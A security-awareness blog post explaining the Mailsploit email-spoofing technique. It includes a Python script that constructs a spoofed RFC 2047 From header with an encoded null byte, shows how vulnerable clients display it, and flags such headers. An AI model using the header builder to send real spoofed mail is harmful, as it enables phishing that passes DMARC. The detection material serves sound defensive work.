
Mailsploit: The Undetectable Spoofing Attack [Updated 2019]

August 26, 2019 by Megan Sawle

In December 2017, pentester Sabri Haddouche disclosed a major new email spoofing technique. Named Mailsploit, it abuses bugs in how email clients decode RFC 2047 encoded-word headers: a From header that base64- or quoted-printable-encodes a spoofed address followed by a null byte (or a newline) is decoded by the client, which then cuts the string off at the control character and displays only the spoofed address. Over 30 email applications were found to be vulnerable, including popular clients like Microsoft Outlook 2016, Apple Mail, Yahoo! Mail and more.

Mailsploit passes through mail servers unchanged and is not stopped by spoofing protections such as DMARC or by spam filters: the server evaluates those checks against the attacker's real sending domain, the part of the From header after the final @, so the message passes authentication, while the recipient's client shows a completely different, legitimate-looking sender. In most cases, unless the raw headers are inspected by a technician, an email sent using Mailsploit is indistinguishable from a genuine one.
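The following Python script is an added example written for this page; it is not code from the original article and not Haddouche's Mailsploit proof of concept. It builds a Mailsploit-style From header from a constructed spoofed address (ceo@example.com) and a constructed attacker domain (attacker.example), shows what a client that stops at the first null byte displays, shows the domain a server-side DMARC check actually evaluates, and ends with the header check a technician can run: a decoded From header that contains control characters, or whose displayed domain differs from the DMARC-evaluated domain, is flagged. The helper names, the small encoded-word decoder and the sample headers are all assumptions made for this example, and the check assumes the header value has already been unfolded.

```python
"""Mailsploit-style From header: build it, see what a buggy client shows,
see what DMARC sees, and flag it.

Added example for this page, not Haddouche's proof of concept and not code
from the original article. Addresses, domains and helper names are
constructed for illustration.
"""
import base64
import re

# RFC 2047 encoded-word: =?charset?encoding?payload?=  (encoding is B or Q)
ENCODED_WORD = re.compile(r"=\?([^?]+)\?([bBqQ])\?([^?]*)\?=")
# Characters a display layer may treat as end-of-string or line break.
# Tab is excluded because unfolded headers legitimately contain it.
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0a-\x1f\x7f]")


def encoded_word(text: str, encoding: str = "b") -> str:
    """Wrap text in an encoded-word using base64 ('b') or Q encoding ('q')."""
    if encoding == "b":
        payload = base64.b64encode(text.encode("utf-8")).decode("ascii")
    else:
        # Q encoding: printable ASCII except '=', '?', '_' passes through,
        # everything else becomes =XX (hex of the UTF-8 byte).
        payload = "".join(
            chr(b) if 0x21 <= b <= 0x7E and chr(b) not in "=?_" else f"={b:02X}"
            for b in text.encode("utf-8")
        )
    return f"=?utf-8?{encoding}?{payload}?="


def build_mailsploit_from(spoofed: str, real_domain: str) -> str:
    """Mailsploit's trick: spoofed address, an encoded NUL byte, the spoofed
    address again, then the attacker's real domain (the only part a mail
    server parses as the sender domain)."""
    return (encoded_word(spoofed, "b")
            + encoded_word("\x00", "q")
            + encoded_word(spoofed, "b")
            + "@" + real_domain)


def decode_header_value(header: str) -> str:
    """Decode every encoded-word in a header value; other text is kept as-is.
    Control characters are preserved, not silently dropped."""
    def _decode(m):
        charset, enc, payload = m.group(1), m.group(2).lower(), m.group(3)
        if enc == "b":
            raw = base64.b64decode(payload)
        else:
            text = payload.replace("_", " ")
            raw = re.sub(r"=([0-9A-Fa-f]{2})",
                         lambda h: chr(int(h.group(1), 16)), text).encode("latin-1")
        return raw.decode(charset, errors="replace")
    return ENCODED_WORD.sub(_decode, header)


def _addr_spec(value: str) -> str:
    """addr-spec from 'Name <local@domain>' or a bare 'local@domain'."""
    value = value.strip()
    if "<" in value and value.endswith(">"):
        return value[value.rfind("<") + 1:-1]
    return value


def dmarc_from_domain(header: str) -> str:
    """Domain DMARC alignment is checked against: the server parses the raw,
    undecoded header, so this is the text after the last '@'."""
    return _addr_spec(header).rsplit("@", 1)[-1].lower()


def displayed_sender(header: str) -> str:
    """What a client with the Mailsploit bug shows: it decodes the header and
    then stops at the first NUL byte (C-string truncation)."""
    return decode_header_value(header).split("\x00", 1)[0]


def displayed_domain(header: str) -> str:
    """Domain of the address the user actually sees."""
    shown = _addr_spec(displayed_sender(header))
    return shown.rsplit("@", 1)[-1].lower() if "@" in shown else ""


def is_suspicious_from(header: str) -> bool:
    """Header check for technicians: control characters in the decoded From
    header, or a displayed domain that differs from the DMARC-evaluated
    domain, both indicate a Mailsploit-style header."""
    if CONTROL_CHARS.search(decode_header_value(header)):
        return True
    return displayed_domain(header) != dmarc_from_domain(header)


if __name__ == "__main__":
    # Constructed sample: spoof ceo@example.com from the attacker's domain.
    header = build_mailsploit_from("ceo@example.com", "attacker.example")
    print("Raw From header   :", header)
    print("Buggy client shows:", displayed_sender(header))
    print("DMARC evaluates   :", dmarc_from_domain(header))
    print("Suspicious?       :", is_suspicious_from(header))
    legit = encoded_word("Alice", "b") + " <alice@example.com>"
    print("Legitimate header suspicious?:", is_suspicious_from(legit))
```

The same check flags the newline variant of the attack (an encoded `=0A` instead of `=00`), since any control character in a decoded From header is abnormal. Note that the check runs on the raw header as received by the server or exported from the client; the rendered sender name shown in the client is exactly what cannot be trusted.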


It gets worse: According to Haddouche, emails sent using Mailsploit are virtually unstoppable at this point in time.

Where Do We Go From Here?

In a post-Mailsploit world, it is now more important than ever to avoid sending sensitive and confidential information over email. Email users everywhere must assume no information sent via email is secure.

Here are four ways you can fight Mailsploit and other email-based threats with security awareness training:

1. Teach Your Workforce Email Use Best Practices

Mailsploit is not the first email-based security threat facing your workforce. Every day they receive phishing emails and malware from attackers trying to breach your systems. Many of these attacks are designed to circumvent technical controls, leaving it up to your team to spot and stop them. It’s essential that your security awareness training program covers email-based threats in detail and reinforces email use best practices.

Want to learn more about phishing? Here's an article on 10 Most Common Phishing Attacks!

2. Ask Your Workforce to Verify Email Sender Identity

Always take time to evaluate an email before replying to it or acting on it. If you don’t know the sender, or it is unusual for that sender to contact you, confirm the request through a channel other than email, such as a phone number you already have on file rather than one given in the message.

3. Educate Your Workforce About the Dangers of Sharing Sensitive Information Via Email

Email should never include sensitive information. This was true before the discovery of Mailsploit and remains especially true now. As soon as information leaves your network, you lose control over how the data is used and shared. Always call or find another way to communicate sensitive information.

4. Enroll Your Workforce in Ongoing Security Awareness Training

New security threats like Mailsploit emerge every day. Enrolling your team in engaging security awareness training will keep them current on these threats and teach them the value of secure behavior.

SecurityIQ by InfoSec Institute integrates security awareness training, phishing simulations and personalized learning in one platform. It self-evolves with employees’ security aptitudes, roles and learning styles to create personalized learning experiences that motivate everyone to care about security and change their behaviors. This gives you more time to patch technical vulnerabilities, while ensuring your human firewall remains secure.


Megan Sawle

Megan Sawle is a communications and research professional with 10 years of experience in cybersecurity, bioscience and higher education. Megan leads Infosec’s research strategy, leveraging study findings to mature its cybersecurity education offerings and build awareness of cybersecurity diversity and skill shortage challenges. Since joining the team, she’s directed research projects on a wide variety of cybersecurity topics ranging from dark web marketplaces and phishing kits to the Workforce Framework for Cybersecurity (NICE Framework) and the importance of soft skills in cybersecurity roles. Megan is a University of Wisconsin-Stout graduate, an avid equestrian and (very) amateur mycologist.